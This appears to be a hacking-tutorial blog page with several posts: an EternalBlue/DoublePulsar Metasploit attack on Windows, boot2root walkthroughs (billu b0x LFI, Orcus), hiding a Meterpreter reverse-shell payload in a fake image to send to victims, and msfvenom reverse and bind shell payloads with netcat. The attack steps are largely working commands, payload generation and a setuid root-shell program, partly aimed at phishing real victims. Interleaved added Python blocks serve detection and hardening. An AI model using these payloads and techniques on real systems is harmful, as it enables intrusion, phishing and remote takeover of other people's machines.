Showing posts with label Kali Linux.

Exploit Remote Windows PC with Eternalblue & Doublepulsar Exploit in Metasploit

Through this article we are sharing a recent zero-day exploit which requires the Metasploit Framework to attack any other Windows-based system. This exploit is a combination of two tools: "EternalBlue", which is used as a backdoor in Windows, and "DoublePulsar", which is used for injecting a DLL file with the help of a payload. So we will manually add this exploit to the Metasploit Framework and set up to attack Windows Server 2008.

Attacker: Kali Linux
Target: Windows 7 and Windows Server 2008

Let’s Start!
Open the terminal in Kali Linux and type the following command to download this exploit from GitHub.

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git


Once the exploit has been downloaded, open the folder and copy the Eternalblue-Doublepulsar .rb Ruby file so that we can add this exploit to Metasploit.


Now paste the copied Ruby file into the path /usr/share/metasploit-framework/modules/exploits/windows/smb, which will add this exploit to the Metasploit Framework.


Then load the Metasploit Framework and type the following to test the zero-day exploit:
msfconsole
This module exploits a vulnerability in the SMBv1 and SMBv2 protocols through EternalBlue. After that, DoublePulsar is used to remotely inject a malicious DLL.
use windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set eternalbluepath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /root/Desktop/eternalblue_doublepulsar-metasploit/deps
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64
msf exploit(eternalblue_doublepulsar) > set processinject lsass.exe
msf exploit(eternalblue_doublepulsar) > set lhost 192.168.1.6
msf exploit(eternalblue_doublepulsar) > set rhost 192.168.1.104
msf exploit(eternalblue_doublepulsar) > exploit

Hence from the screenshot you can observe that we only need to set the target's architecture and IP before launching the exploit; once all the information is set, launch your attack, which will give you a Meterpreter session successfully, as it did for me.
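An added example from the defender's side, not part of the original post: EternalBlue depends on the target still speaking SMBv1, and the DoublePulsar implant it installs answers SMBv1 Trans2 requests with a distinctive multiplex ID (0x51 where a clean host echoes 0x41, the indicator used by the public DoublePulsar detection scripts). The Python below parses the 32-byte SMBv1 header from NetBIOS-framed packets, separates SMBv1 from SMB2/3, and flags SMBv1 negotiation and that implant indicator. Every packet is constructed inline from the protocol layout; nothing here is captured traffic from the lab.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB1_COM_TRANSACTION2 = 0x32
SMB1_COM_NEGOTIATE = 0x72
SMB1_FLAGS_REPLY = 0x80
DOUBLEPULSAR_MID = 0x51   # implant answers Trans2 with MID 0x51; a clean host echoes 0x41


def netbios_wrap(smb: bytes) -> bytes:
    """Prefix an SMB message with the 4-byte NetBIOS session service header (type 0 + 3-byte length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_smb1(command: int, flags: int = 0, mid: int = 0x41) -> bytes:
    """Build a bare 32-byte SMBv1 header (constructed sample, no parameter/data blocks)."""
    hdr = SMB1_MAGIC + bytes([command])
    hdr += struct.pack("<IBH", 0, flags, 0xC807)               # Status, Flags, Flags2
    hdr += struct.pack("<H", 0) + b"\x00" * 8 + b"\x00\x00"    # PIDHigh, SecurityFeatures, Reserved
    hdr += struct.pack("<HHHH", 0, 0xFEFF, 0, mid)              # TID, PIDLow, UID, MID
    return netbios_wrap(hdr)


def classify(packet: bytes) -> str:
    """Tell SMBv1 from SMB2/3 by the 4-byte protocol id that follows the NetBIOS header."""
    proto = packet[4:8]
    if proto == SMB2_MAGIC:
        return "smb2"
    if proto == SMB1_MAGIC:
        return "smb1"
    return "other"


def parse_smb1_header(packet: bytes) -> dict:
    """Decode the fixed SMBv1 header fields a detector cares about."""
    if len(packet) < 36 or packet[4:8] != SMB1_MAGIC:
        raise ValueError("not an SMBv1 message")
    hdr = packet[4:36]
    status, flags, flags2 = struct.unpack_from("<IBH", hdr, 5)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {"command": hdr[4], "status": status, "is_reply": bool(flags & SMB1_FLAGS_REPLY),
            "flags2": flags2, "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def triage(packets) -> list:
    """Return (index, tag, explanation) findings for a list of NetBIOS-framed SMB packets."""
    findings = []
    for i, pkt in enumerate(packets):
        if classify(pkt) != "smb1":
            continue
        h = parse_smb1_header(pkt)
        if h["command"] == SMB1_COM_NEGOTIATE and not h["is_reply"]:
            findings.append((i, "smbv1-negotiate",
                             "client still negotiates SMBv1; disable the protocol on the server"))
        if h["command"] == SMB1_COM_TRANSACTION2 and h["is_reply"] and h["mid"] == DOUBLEPULSAR_MID:
            findings.append((i, "doublepulsar-mid-0x51",
                             "Trans2 reply carries MID 0x51, the public DoublePulsar indicator"))
    return findings


# Constructed sample traffic: one SMB2 message, one SMBv1 negotiate, two Trans2 replies.
SAMPLE_PACKETS = [
    netbios_wrap(SMB2_MAGIC + b"\x00" * 60),
    build_smb1(SMB1_COM_NEGOTIATE),
    build_smb1(SMB1_COM_TRANSACTION2, SMB1_FLAGS_REPLY, 0x41),
    build_smb1(SMB1_COM_TRANSACTION2, SMB1_FLAGS_REPLY, 0x51),
]

if __name__ == "__main__":
    for idx, tag, why in triage(SAMPLE_PACKETS):
        print(f"packet {idx}: {tag}: {why}")
```

The first finding is the one that matters most operationally: if no client ever negotiates SMBv1, the server can drop the dialect entirely and this exploit has nothing to work with.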


Hack the billu: b0x VM (Boot2root Challenge)

Hi friends! Once again we are here with a new vulnerable lab challenge, "Billu Box", created by Manish Kishan Tanwar. It is very simple and easy, especially for beginners, to complete the challenges; mainly the attacker needs to escalate privileges to gain root access. You can download it from here.

Let’s breach!!!

Open the terminal in your Kali Linux and scan your network using the netdiscover command; from the scanning result I got the target IP 192.168.1.102.


Then use an nmap aggressive scan for port and protocol enumeration:
nmap -p- -A 192.168.0.102
So here I found that ports 22 and 80 are open, for SSH and HTTP respectively.


Since port 80 is open, I explored the target IP in the browser, but here I didn't get any remarkable result.


Without wasting time I chose another tool, dirb, for a directory brute-force attack, and started brute-forcing directories.

Awesome! We have stepped in the right direction and dug out many directories; when you look at the given screenshot you will see that I have highlighted the "test" directory. So now I will go with the test directory.


So when I opened the test.php file in the browser, I found the message "file parameter is empty please provide file path in file parameter", where the file parameter is vulnerable to LFI.

Using the HackBar tool, which is a Firefox plug-in, and taking advantage of the LFI vulnerability, I tried to include index.php through the file parameter with file=index.php.


When I opened index.php, I found that another file, c.php, is included.


So again with the help of HackBar I looked at the c.php file via file=c.php for further enumeration, so that we could find some clue to exploit the target.


When I read c.php, I got some information related to the connected database; the highlighted text looks like credentials for the database.


If you remember the result of the dirb tool, it had revealed another directory, phpmy, so I will go with phpmy for further enumeration.


Then, again taking advantage of the LFI, I explored config.inc.php via file=/var/www/phpmy/config.inc.php.


Last but not least, we have finally achieved something very remarkable: in the given screenshot you can read from the config.inc.php file that I found the server's login username and password, root:toor respectively.


From the port enumeration result we found that port 22 is open for SSH, so I tried root:toor for SSH login. When I used these credentials for SSH login I successfully got root access; hence the given challenge is completed.
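The LFI above works because test.php hands the file parameter to the include unchanged, so a sibling file (c.php) and an absolute path (/var/www/phpmy/config.inc.php) are both served. As an added example that is not code from the VM or the write-up, the Python below puts that vulnerable path-resolution pattern beside a hardened one that allow-lists the includable names and then verifies the resolved path still sits under the document root. WEB_ROOT and the allow-list entries are constructed values; the probes are the requests made in the write-up plus a relative traversal to the same config file.

```python
import os

WEB_ROOT = "/var/www/html"                        # hypothetical document root
ALLOWED_INCLUDES = {"index.php", "about.php"}     # constructed allow-list of includable files


def resolve_vulnerable(root: str, file_param: str) -> str:
    """Mirror of test.php: whatever the client sends in file= becomes the include path.

    os.path.join discards root when file_param is absolute, and normpath
    follows '..', which is exactly how the include behaved on the box.
    """
    return os.path.normpath(os.path.join(root, file_param))


def resolve_hardened(root: str, file_param: str):
    """Allow-list the requested name, then confirm the real path is still under root.

    Returns the path to include, or None when the request must be refused.
    The realpath/commonpath check is defence in depth against symlinks and
    '..' should the allow-list ever be loosened to user-supplied paths.
    """
    if file_param not in ALLOWED_INCLUDES:
        return None
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, file_param))
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate


# The requests from the write-up, plus a relative traversal to the same config file.
PROBES = ["index.php", "c.php", "/var/www/phpmy/config.inc.php", "../phpmy/config.inc.php"]


def probe(resolver, root: str = WEB_ROOT) -> dict:
    """Run every probe through one resolver and map request -> resolved path (or None)."""
    return {p: resolver(root, p) for p in PROBES}


if __name__ == "__main__":
    for name, resolver in (("vulnerable", resolve_vulnerable), ("hardened", resolve_hardened)):
        print(name)
        for req, result in probe(resolver).items():
            print(f"  file={req!r:40} -> {result}")
```

The allow-list is the actual fix; the realpath containment check only exists so that a later "just let users pass a subdirectory" change cannot silently reopen the hole.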

Embedded Backdoor with Image using FakeImageExploiter

In this article we are introducing a newly launched hacking tool, "Fake Image Exploiter". It is designed to make it easier for attackers to perform phishing or social-engineering attacks by generating a fake image with a hidden malicious .bat/.exe file inside it.

Let’s start!
Open the terminal in your Kali Linux and type the following command to download it from GitHub.

git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git


Once it is downloaded, open the folder and select the "settings" file for configuration before running the program, as shown in the given screenshot.


Now make some changes inside the settings file as shown in the screenshot:
Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any extension among these four: ps1, bat, txt, exe. I set PAYLOAD_EXETNSION=bat, similarly set BYPASS_RH=NO, and scrolled down for the next configuration.


In the same way set these two values also, as shown in the screenshot, then save the changes.
AUTO_PAYLOAD_BUILD=YES
AGENT_HANLER_PORT=4444


After making these changes in the settings file, open the terminal and run the program file:
cd FakeImageExploiter
./FakeImageExploiter.sh


Click on YES to execute the framework.


Select the payload to build; I chose windows/meterpreter/reverse_tcp for the attack.


After that a pop-up box will open which allows you to choose any JPG image, so that the .bat payload can be hidden inside that image.


Now select an icon for your malicious image.


Give a name to your payload, which will be displayed to the victim as the file name; from the screenshot you can see I gave sales.


Now it generates a link, as you can observe from the highlighted part of the screenshot; then send this link to the victim. The victim will download the zip file and click on sales.jpg.


When the victim clicks on sales.jpg, we will get a Meterpreter session in the background in the Metasploit Framework.
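Added example, not part of the original post or the FakeImageExploiter project: the lure here is an archive whose "image" is really a script, so a mail gateway or upload filter should judge archive members by their leading bytes and full extension chain, never by the displayed name. The Python below inspects a zip in memory and reports image-named members whose content is not an image, double extensions that end in an executable type, and any executable member at all. The sample archive is constructed inline (its "sales.jpg" member is a harmless placeholder batch line), and the same check applies to zip uploads accepted by a web application.

```python
import io
import zipfile

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
EXEC_EXTS = {".exe", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".scr", ".com"}
EXPECTED_KIND = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}


def sniff_type(data: bytes) -> str:
    """Identify content from its leading bytes instead of trusting the file name."""
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"GIF8"):
        return "gif"
    if data.startswith(b"MZ"):
        return "pe-executable"
    head = data.lstrip().lower()
    if head.startswith((b"@echo", b"rem ", b"cmd", b"powershell", b"start ")):
        return "batch-script"
    return "unknown"


def extensions(name: str) -> list:
    """All dotted suffixes of the base name, e.g. 'sales.jpg.bat' -> ['.jpg', '.bat']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return ["." + part for part in base.split(".")[1:]]


def inspect_member(name: str, head: bytes) -> list:
    """Findings for one archive member, judged on its extension chain and first bytes."""
    exts = extensions(name)
    last = exts[-1] if exts else ""
    kind = sniff_type(head)
    findings = []
    if last in EXEC_EXTS:
        findings.append("executable-member")
    if len(exts) > 1 and last in EXEC_EXTS and any(e in IMAGE_EXTS for e in exts[:-1]):
        findings.append("double-extension")
    if last in EXPECTED_KIND and kind != EXPECTED_KIND[last]:
        findings.append(f"content-mismatch:{kind}")
    return findings


def inspect_zip(blob: bytes) -> dict:
    """Map each suspicious member of an in-memory zip to its list of findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(64)        # the leading bytes are enough to sniff the type
            found = inspect_member(info.filename, head)
            if found:
                report[info.filename] = found
    return report


def build_sample_zip() -> bytes:
    """Constructed lure archive: a real JPEG header, a batch file named like an image,
    and a PE stub behind a double extension. None of these are real payloads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 28)
        zf.writestr("sales.jpg", b"@echo off\r\nrem constructed placeholder, does nothing\r\n")
        zf.writestr("invoice.png.exe", b"MZ" + b"\x00" * 30)
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in inspect_zip(build_sample_zip()).items():
        print(f"{member}: {', '.join(findings)}")
```

Reading only the first 64 bytes of each member keeps the check cheap enough to run on every inbound archive, and the content-mismatch rule is the one that catches the "sales.jpg" trick regardless of how the name is dressed up.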

2 ways to use Msfvenom Payload with Netcat

In this article you will learn how we can connect to the victim through a netcat shell using an msfvenom payload. There are two different ways of hacking any system using msfvenom with netcat.

1st Method
First open the terminal and type the following msfvenom command, which generates an exe payload:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=8956 -f exe > /root/Desktop/root.exe


Then send this root.exe file to the victim, open another terminal for the netcat shell and type the following command:
nc 192.168.0.103 8956
When the victim clicks on the root.exe file, the attacker gets access to the victim's system.


2nd Method
Again open the terminal and type the following msfvenom command, which generates an exe payload:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=8888 -f exe > /root/Desktop/1.exe


Then send this 1.exe file to the victim, open another terminal for the netcat shell and type the following command:
nc -lvp 8888
When the victim clicks on the 1.exe file, the attacker gets a reverse connection from the victim's system.


Hack the Orcus CTF Challenge

Hello friends! Today again we are here with a new vulnerable hub challenge, "ORCUS", designed by Mr. Viper. Through this article we are sharing the efforts we made to complete the challenge, so that we can catch the flags and beat the goal of this VM machine. This machine contains 4 flags: 1. Get a shell; 2. Get root access; 3. There is a post-exploitation flag on the box; 4. There is something on this box.

You can download it from here.

Let’s Breach!!
192.168.0.151 is the target IP. As we know, enumeration must be the first step for gathering information about any victim, so I used a version scan through nmap.
nmap -p- -sV 192.168.0.151

From the screenshot you can see there are many open ports, but I will go with port 80.


Since port 80 was open, I explored the target IP 192.168.0.151 in the browser, but here I didn't get any remarkable thing.


Without wasting time I chose another tool, dirb, for a directory brute-force attack. To start the brute-force attack for directories, open the terminal and type the following:

Awesome! We have stepped in the right direction and dug out many directories; when you look at the given screenshot you will see that I have highlighted the "backups" directory. So now I will go with the backups directory.


In the browser I explored 192.168.0.151/backups as the URL, where I found a tar file, "simple PHP Quiz-backup.tar.gz". Without taking more time I just downloaded it for further enumeration.

After unzipping and opening it I found PHP and HTML files inside; keeping my eyes on the PHP files, I chose db-conn.php to fetch more details in the hope of getting something related to the database.


Finally, after many efforts, I found the database username and password as dbuser:dbpasswords respectively.


In the dirb brute-force attack we found many directories; once again, if you scroll up you will notice the phpmyadmin directory in the screenshot above. Now I will move back to the browser to explore 192.168.0.151/phpmyadmin as the URL. From the screenshot below you can observe that I entered the above username and password here.


When you give the correct login credentials, it lets you log in to the phpMyAdmin page. From the screenshot you can see I have successfully logged in using the above credentials; here I found a database "zenphoto" and decided to move inside it for further details.

Inside zenphoto I found a setup page which will update the configuration file for the database inside the web server once we fill in the information in the given text fields.


Here we only need to provide the database username, i.e. dbuser, and the database password, i.e. dbpassword.
Without disturbing the other fields, click on save, which will start the zenphoto database installation.


The installation starts when you click on the go tab given at the end of the page. The zenphoto setup will start installing themes and plug-ins for your database; after that you have to set your admin user and password.


Further, click on the given tab "I agree to these terms and conditions".


Now type the name for the new user as admin, type password: password and confirm the password as shown in the image below, and then click on the apply tab given at the top.


Then log in to zenphoto using the credentials admin:password. Now we are inside the admin console, where we decided to upload an image, but here we can upload a zip file only.


Now use msfvenom to generate a malicious PHP script by typing the following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

From the screenshot you can read the generated PHP script; now we need to copy the highlighted text, paste it into a text document and save it as shell.php. After that, create a new folder, copy shell.php into it and compress it.

The most important thing is to start the multi/handler inside Metasploit.


Then come back to the browser to upload your zip file: browse to your file and click on upload. Then explore the URL 192.168.0.151/zenphoto/albums; from the given image you can see our shell.php is successfully uploaded. Now click on it.


When you click on shell.php you will get a Meterpreter session inside Metasploit. Now type the following commands in order to catch the flag:
meterpreter > cd /var/www
meterpreter > ls
meterpreter > cat flag.txt

Congrats! We have caught the 1st flag.


After many efforts I found a folder, kippo, and stepped towards it for more information.
meterpreter > pwd
meterpreter > cd ..
meterpreter > cat etc/kippo/data/userdb.txt
Finally! Caught the 2nd flag also.

Now for root privilege escalation, open a text document and enter the following (reference:
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary):

#define _GNU_SOURCE            /* setresuid() is a GNU extension declared in unistd.h */
#include <stdlib.h>
#include <unistd.h>
int main(void) {
                setresuid(0, 0, 0);    /* real, effective and saved UID all set to root */
                system("/bin/bash");
                return 0;
}
Then save it as raj.c on the desktop.


Now upload the raj.c file, compile it and gain root access as shown in the following image.
meterpreter > upload /root/Desktop/raj.c
meterpreter > shell
gcc -o raj raj.c


Since we know from nmap's result that the NFS port was open on the target IP, we will take advantage of it and mount the target's /tmp share in our Kali Linux. Now create a folder named mount and mount the data inside it:

mount -t nfs 192.168.0.151:/tmp mount
chown root:root raj
chmod u+s raj


./raj
id
cd /root
cat flag.txt
Great!! We have caught the 3rd flag also.
Now try yourself to find out one more flag.
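Added example, not part of the original post: the root step above rests on two server-side conditions a defender can check directly, an NFS export with no_root_squash (so a client's root can drop root-owned setuid files onto the share) and the resulting presence of unexpected setuid binaries. The Python below audits /etc/exports lines for no_root_squash, writable wildcard exports and the insecure option, and scans a directory tree for setuid files. The sample exports text and the temporary "raj" file it plants for the scan are constructed, not taken from the VM.

```python
import os
import re
import stat
import tempfile


def parse_exports(text: str) -> list:
    """Parse /etc/exports into (path, host, [options]) tuples.

    Handles the usual '<path> <host>(<opts>) ...' form; a host written without
    parentheses gets the exportfs defaults (ro, root_squash), represented as [].
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        path, clients = tokens[0], tokens[1:]
        for tok in clients:
            m = re.fullmatch(r"([^(]*)\(([^)]*)\)", tok)
            if m:
                host = m.group(1) or "*"                      # bare "(opts)" applies to every host
                opts = [o for o in m.group(2).split(",") if o]
            else:
                host, opts = tok, []
            entries.append((path, host, opts))
    return entries


def audit_exports(text: str) -> list:
    """Flag exports that let any client write as root, or that anyone at all can write to."""
    findings = []
    for path, host, opts in parse_exports(text):
        optset = set(opts)
        wildcard = host == "*" or host.startswith("*.")
        if "no_root_squash" in optset:
            findings.append((path, host, "no_root_squash"))   # client root is server root
        if wildcard and "rw" in optset:
            findings.append((path, host, "wildcard-rw"))
        if "insecure" in optset:
            findings.append((path, host, "insecure"))         # accepts unprivileged source ports
    return findings


def find_setuid(root_dir: str) -> list:
    """Regular files under root_dir carrying the setuid bit (e.g. a binary planted over NFS)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fn in files:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p)
    return sorted(hits)


def demo_setuid_scan() -> list:
    """Plant a constructed empty setuid file in a temp dir and return the base names found."""
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("plain", 0o644), ("raj", 0o4755)):
            p = os.path.join(d, name)
            with open(p, "wb"):
                pass
            os.chmod(p, mode)
        return [os.path.basename(p) for p in find_setuid(d)]


# Constructed sample modelled on the lab's writable /tmp export; not the VM's real file.
SAMPLE_EXPORTS = """\
/tmp        *(rw,sync,no_root_squash,no_subtree_check)
/srv/share  192.168.0.0/24(ro,sync,root_squash)
/home/data  *(rw,sync)
"""

if __name__ == "__main__":
    for path, host, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {host}: {issue}")
    print("setuid files found in demo dir:", demo_setuid_scan())
```

Of the two checks, the exports audit is the preventive one: with root_squash left in place (the exportfs default) a client's chown root:root and chmod u+s on the share are squashed to nobody, and the planted binary never becomes a root shell. The setuid scan is the detective control for shares where that has already happened.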